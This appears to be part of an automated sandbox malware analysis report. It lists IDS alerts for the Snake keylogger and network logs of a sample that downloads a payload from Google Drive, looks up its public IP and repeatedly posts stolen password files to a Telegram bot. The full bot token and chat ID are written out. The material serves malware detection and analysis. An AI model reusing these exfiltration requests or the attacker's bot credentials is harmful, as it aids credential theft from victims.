            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50015 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50076 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50072 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50076 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50072 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50065 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50065 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50047 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50047 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50063 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50063 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50049 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50049 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50059 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50059 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50043 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50017 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50051 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50017 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50043 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50051 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50082 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50057 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50039 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50082 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50057 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50013 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50021 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50039 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50013 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50021 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50078 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50078 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50037 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50037 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49995 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49997 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49997 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49995 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50029 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50029 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50035 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50080 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50035 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50080 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50070 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50070 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50068 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50068 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50053 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50053 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50074 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50074 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3195ed612844Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31af086f28d9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31c547a1f7ecHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31db740fc421Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31eecc056063Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3202163f9addHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3215538ae355Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3227251c8d9eHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd323fbd7b0627Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325171dc5706Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3261bf4f0807Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32735dd22759Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32864a6a8abcHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329a828fcc76Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32aeab857d1aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c16ebc6854Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d57a7f140fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32e8229d8d62Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32fabd7561cbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd330e9e22c452Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33226ffebf79Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3334e233e59fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33489733ac2dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd335edc34d36fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3373c2fc3f18Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd338b355bade0Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a3e2842e8eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33bdc8e3eadeHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33d8e5a89915Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33f53b4a9af3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3412c5964a4aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3432c65a2e7cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34590f156764Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd347a37ca4cc1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3498c045968aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34bc362efad8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34e226fe6ed0Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd350bc3e4dbe2Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3537da7c3adbHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd356145cdd8a1Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35896607e1ddHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35c03d1e8178Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd360fa29ea145Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd364c895051e4Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36894d4ea567Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36c493ff07a4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd370e456300b2Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49973 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49910 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49869 -> 142.250.186.142:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
